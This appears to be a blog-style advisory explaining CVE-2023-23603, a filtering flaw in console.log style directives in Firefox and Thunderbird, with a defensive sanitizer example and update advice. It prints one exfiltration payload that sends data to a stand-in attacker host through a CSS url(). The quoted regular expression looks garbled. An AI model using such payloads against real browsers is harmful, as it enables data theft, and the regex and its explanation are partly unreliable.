CVE-2023-23603: An Unassuming Regular Expression Flaw Leads to Data Exfiltration in Firefox and Thunderbird

A newly discovered vulnerability, CVE-2023-23603, affects commonly used Mozilla products, namely Firefox, Thunderbird, and Firefox ESR. By exploiting this vulnerability, a malicious actor can exfiltrate sensitive data from your browser. In this post, we'll break down the exploit details, the products affected, and what the issue specifically entails. We'll also provide some code snippets to help visualize the problem and emphasize the underlying concepts.

Background

Mozilla's Firefox and Thunderbird are popular choices for browsing and email, respectively. They boast a large and ever-growing user base, making them desirable attack targets. This vulnerability, found in versions of Firefox preceding 109, Thunderbird before 102.7, and Firefox ESR before 102.7, lies deep within the code responsible for filtering out forbidden properties and values from style directives.

The vulnerability is rooted in regular expressions, which are patterns used to find matches in strings of text. In this case, the regexp is responsible for filtering out forbidden properties and values from style directives in calls to console.log. The regexp did not account for external URLs, so a style directive that referenced one passed the filter and data could leave the browser.

The regular expression in question looks like this:

/^(?:[a-z-9]+\:)*\/\/(?:[a-z-9-_.]+(?:\:\d+)?\/(?:[^?"#]+\/)*[^?#"']*|about:blank|javascript:.*|"blob:.*)"$/i

The goal of this regular expression is to filter out forbidden properties and values from style directives, but unfortunately, it falls short of covering all possibilities. Specifically, it fails to account for external URLs being present in the style directives.

Due to this oversight, an attacker could potentially take advantage of this vulnerability to exfiltrate sensitive data from the browser. To illustrate, let's take a look at a sample payload:

console.log('%c Hello World', 'background:url("https://attacker_site.com/?data=my_sensitive_data");');

Here, the payload looks like a regular styled console log message. However, the CSS background property uses the url() function, ostensibly to set a background image. In reality, resolving that URL sends the sensitive data embedded in it to an attacker-controlled endpoint, which then logs and stores the data for malicious purposes.
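
The following filter is an added example, not code from Firefox or from the original post: it shows an allowlist-based alternative to a single forbidden-pattern regexp, dropping any style declaration whose value could trigger a network fetch. The property allowlist, the list of fetching functions, and all function names are assumptions made for illustration.

```javascript
// Added illustration, not Firefox DevTools code. Allowlists and names are assumptions.
const ALLOWED_PROPS = new Set(["background", "background-image", "color", "font-weight", "padding"]);
const ALLOWED_URL_SCHEMES = new Set(["data:"]);
const FETCHING_FUNCS = /\b(?:image-set|image|cross-fade)\s*\(/i;

// Split on ";" outside quotes and parentheses, so a ";" inside url("...") does not end a declaration.
function splitDeclarations(style) {
  const parts = [];
  let cur = "", quote = null, depth = 0;
  for (const ch of style) {
    if (quote) { if (ch === quote) quote = null; }
    else if (ch === '"' || ch === "'") quote = ch;
    else if (ch === "(") depth++;
    else if (ch === ")") depth = Math.max(0, depth - 1);
    else if (ch === ";" && depth === 0) { parts.push(cur); cur = ""; continue; }
    cur += ch;
  }
  parts.push(cur);
  return parts.map((s) => s.trim()).filter(Boolean);
}

// True only if the value cannot reference an external resource under the rules above.
function valueIsSafe(value) {
  // CSS escapes and comments can disguise "url(", so reject them outright (fail closed).
  if (value.includes("\\") || value.includes("/*")) return false;
  if (FETCHING_FUNCS.test(value)) return false;
  for (const m of value.matchAll(/url\s*\(\s*(["']?)([^"')]*)\1\s*\)?/gi)) {
    const target = m[2].trim().toLowerCase();
    const scheme = (target.match(/^[a-z][a-z0-9+.-]*:/) || [""])[0];
    // Relative paths, protocol-relative //host and http(s) all fail this check.
    if (!ALLOWED_URL_SCHEMES.has(scheme)) return false;
  }
  return true;
}

// Keep only allowlisted properties whose values pass valueIsSafe; drop everything else.
function sanitizeConsoleStyle(style) {
  const kept = [];
  for (const decl of splitDeclarations(style)) {
    const idx = decl.indexOf(":");
    if (idx < 1) continue; // no property name
    const prop = decl.slice(0, idx).trim().toLowerCase();
    const value = decl.slice(idx + 1).trim();
    if (ALLOWED_PROPS.has(prop) && valueIsSafe(value)) kept.push(`${prop}: ${value}`);
  }
  return kept.join("; ");
}
```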

Firefox (< 109)
Thunderbird (< 102.7)
Firefox ESR (< 102.7)

If you are using any of these products and your version is earlier than the ones mentioned above, you are susceptible to this vulnerability.

To stay protected, ensure that you have the latest version of your Mozilla product, check for updates regularly, and always keep security in mind when browsing or using email. And remember, even the most unassuming piece of code, like a regular expression, can make the difference in staying secure.

Timeline

Published on: 06/02/2023 17:15:00 UTC
Last modified on: 06/08/2023 13:40:00 UTC